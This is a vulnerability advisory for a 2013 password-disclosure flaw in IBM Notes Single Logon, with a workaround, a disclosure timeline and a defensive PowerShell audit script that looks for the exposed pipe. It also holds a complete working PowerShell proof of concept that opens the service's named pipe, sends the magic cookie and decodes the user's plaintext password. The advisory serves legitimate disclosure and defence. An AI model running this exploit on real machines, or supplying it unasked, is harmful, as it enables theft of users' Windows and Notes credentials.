Summary

  • Release Date: 2013-04-24
  • Product: IBM Notes
  • Affected Versions: 7.x, 8.x, and 9.x with Notes Single Logon enabled
  • Vulnerability Type: Information Disclosure
  • Discovered By: Markus Piéton

  • Vendor Advisory: http://www-01.ibm.com/support/docview.wss?uid=swg21634508

IBM Lotus Notes’ Notes Single Logon feature allows users to use the same password for both Notes and the operating system, provided the Microsoft Windows logon password is synchronized with the Notes password. The implementation of “Notes Single Logon” contains a flaw that enables an attacker to retrieve the plain text password.

An attacker can connect to the named pipe of the nlsvice process, \\.\pipe\0x011325d6, and send a special cookie (0x0012cc34) that the service uses to check whether the request is legitimate. After that, the obfuscated password can be read from the pipe.

Workaround

The Notes Single Logon feature is inherently flawed and should not be used. Disable Notes Single Logon and switch to Notes Shared Login or Notes Federated Login (available with Notes 9).
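The following audit script is an added example and is not part of the original advisory or the author's proof of concept. It checks a host for the exposed Single Logon pipe named above and lists clients that connected to it as recorded by Sysmon (Event ID 18, PipeConnected). It assumes Sysmon is installed with pipe-event logging enabled; the process names 'nslsvice' and 'nlsvice' are taken from the advisory text and may not match the installed executable.

```powershell
# Added defender-side audit for the Notes Single Logon pipe (example code,
# not from the advisory). Assumes Sysmon with pipe events; process names are
# taken from the advisory and are an assumption.
$PipeName = '0x011325d6'   # pipe name from the advisory

function Test-NotesSingleLogonExposure {
    # Enumerate the named pipes currently open on this host.
    $pipes   = [System.IO.Directory]::GetFiles('\\.\pipe\')
    $exposed = $pipes | Where-Object { $_ -like "*\$PipeName" }
    # Is the Single Logon service process running? (names assumed)
    $svc = Get-Process -Name 'nslsvice', 'nlsvice' -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        ComputerName   = $env:COMPUTERNAME
        PipeExposed    = [bool]$exposed
        ServiceRunning = [bool]$svc
        ServicePid     = if ($svc) { $svc.Id } else { $null }
        Recommendation = if ($exposed) {
            'Disable Notes Single Logon; use Notes Shared Login or Federated Login'
        } else { 'Pipe not exposed' }
    }
}

function Get-NotesPipeConnections {
    param([int]$Days = 7)
    # Sysmon Event ID 18 = PipeConnected. Any client other than the Notes
    # client connecting to this pipe is worth investigating.
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 18
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($d.PipeName -like "*$PipeName*") {
                [PSCustomObject]@{
                    Time      = $_.TimeCreated
                    Image     = $d.Image
                    ProcessId = $d.ProcessId
                    PipeName  = $d.PipeName
                }
            }
        }
}

Test-NotesSingleLogonExposure
Get-NotesPipeConnections | Format-Table -AutoSize
```

Run it with local administrator rights so that the Sysmon operational log is readable; a host where PipeExposed is true should have Notes Single Logon disabled per the workaround above.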

Timeline

Disclosure timeline:
----------------------------------------------------------------------
22/02/2013: Reported the vulnerability to the vendor.
20/03/2013: Request for confirmation of the issue.
29/03/2013: Vendor responded that a fix is in development.
15/04/2013: Vendor responded that no fix will be implemented.
16/04/2013: Vendor asks to delay the advisory until April 26th to prepare a security bulletin.
24/04/2013: Vendor publishes security bulletin.

Proof of Concept

Function ForceToByte($number)
{
    # Reduce an arithmetic result to a single byte (mod 256).
    return ($number -band 0xFF);
}

Function DecryptString($str, $length)
{
    # Reverses the obfuscation applied by the service: each recovered byte is
    # the received byte 8 positions ahead XORed with a weighted sum of the
    # 8 received bytes before it (the window starting at $pos).
    if ($length -lt 8) { return; }
    if ($length -eq 8) { return $str; }
    $remainingLen = $length-8;
    $pos = 0;
    do {
        $str[$pos] = ForceToByte ($str[$pos+8] -bxor (
            (31 * $str[$pos+1]) +
            (97 * $str[$pos+0]) +
            (17 * $str[$pos+3]) +
            (23 * $str[$pos+4]) +
            (43 * $str[$pos+6]) +
            (59 * $str[$pos+2]) +
            (79 * $str[$pos+7]) +
            (117 * $str[$pos+5])
        ));
        $pos += 1;
        $remainingLen -= 1;
    } while ($remainingLen -ge 0);
    # Return the recovered bytes as ASCII, dropping the trailing bytes.
    [System.Text.Encoding]::ASCII.GetString($str, 0, $length-10);
}

$ascii = [System.Text.Encoding]::ASCII;
$namedPipeTimeout = 2 * 1000; # 2 secs.
$namedPipeStr = "0x011325d6";             # pipe name of the Single Logon service
$magicCookie = $ascii.GetBytes("0x0012cc34"); # cookie the service checks

Write-Output "nslsvice_sploit v0.1 - Markus Piéton";
Write-Output "------------------------------`n";

# Open the service's named pipe on the local machine.
Write-Output "[*] Connecting to 'secured pipe'.";
$pipe = New-Object System.IO.Pipes.NamedPipeClientStream(".", $namedPipeStr);
try {
    $pipe.Connect($namedPipeTimeout);
} catch [TimeoutException] {
    Write-Output "[E] Couldn't connect to the Lotus Notes Single Logon Service!";
    Write-Verbose ("Pipe: " + $namedPipeStr);
    exit;
} catch [System.IO.IOException] {
    Write-Output "[E] The server is connected to another client and the time-out period has expired.";
    exit;
} catch [Exception] {
    Write-Output "[E] Unknown exception occurred!";
    exit;
}

# The cookie is the only check the service performs on the request.
Write-Output "[*] Sending magic cookie.";
$pipe.Write($magicCookie, 0, $magicCookie.Length);

# The service answers with the obfuscated credentials.
Write-Output "[*] Waiting for credentials to arrive.";
$buffer = New-Object byte[] 270;
$length = $pipe.Read($buffer, 0, $buffer.Length);
$pipe.Dispose();

Write-Output "[*] Decrypting password.`n";
Write-Output ("[+] Password: '" + (DecryptString $buffer $length) + "'`n");

Write-Output "Done.`n";